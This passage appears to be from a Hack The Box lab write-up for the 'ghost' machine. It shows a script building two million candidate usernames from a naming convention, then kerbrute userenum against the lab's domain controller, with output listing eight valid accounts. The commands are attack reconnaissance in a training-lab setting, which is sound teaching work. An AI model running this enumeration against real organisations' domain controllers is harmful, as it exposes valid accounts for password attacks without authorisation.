Naming Convention
The naming convention that the target organization appears to use has been disclosed
Wordlist
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ python3 ~/Tools/username_generator.py
Choose username format:
1) hsimpson
2) h.simpson
3) homersimpson
4) homer.simpson
5) hjsimpson
6) homerjsimpson
7) homerjaysimpson
8) homersimpsonb
Option: 4
Mail domain (example: ...@domain.com) [Default: none]:
Domain (example: domain\...) [Default: none]:
Names file path: /usr/share/wordlists/seclists/Usernames/Names/names-usa-top2000.txt
Surnames file path: /usr/share/wordlists/seclists/Usernames/Names/familynames-usa-top1000.txt
Output file [Default: results.txt]:
Output saved in results.txtI will first generate a list of potential usernames following the naming convention
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ wc -l results.txt
2000000 results.txtThe generated list contains 2 million usernames
Username Extraction
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ kerbrute userenum --dc dc01.ghost.htb -d GHOST.HTB ./results.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/15/24 - Ronnie Flathers @ropnop
2024/07/15 13:28:14 > Using KDC(s):
2024/07/15 13:28:14 > dc01.ghost.htb:88
2024/07/15 13:29:10 > [+] VALID USERNAME: JASON.TAYLOR@GHOST.HTB
2024/07/15 13:30:25 > [+] VALID USERNAME: BETH.CLARK@GHOST.HTB
2024/07/15 13:35:41 > [+] VALID USERNAME: CHARLES.GRAY@GHOST.HTB
2024/07/15 13:35:52 > [+] VALID USERNAME: FLORENCE.RAMIREZ@GHOST.HTB
2024/07/15 13:42:53 > [+] VALID USERNAME: ARTHUR.BOYD@GHOST.HTB
2024/07/15 13:48:27 > [+] VALID USERNAME: JUSTIN.BRADLEY@GHOST.HTB
2024/07/15 13:57:36 > [+] VALID USERNAME: KATHRYN.HOLLAND@GHOST.HTB
2024/07/15 14:00:12 > [+] VALID USERNAME: CASSANDRA.SHELTON@GHOST.HTB
2024/07/15 15:09:28 > Done! Tested 2000000 usernames (8 valid) in 6073.606 secondsFound a total of 8 valid domain accounts
I will save these into the users.txt file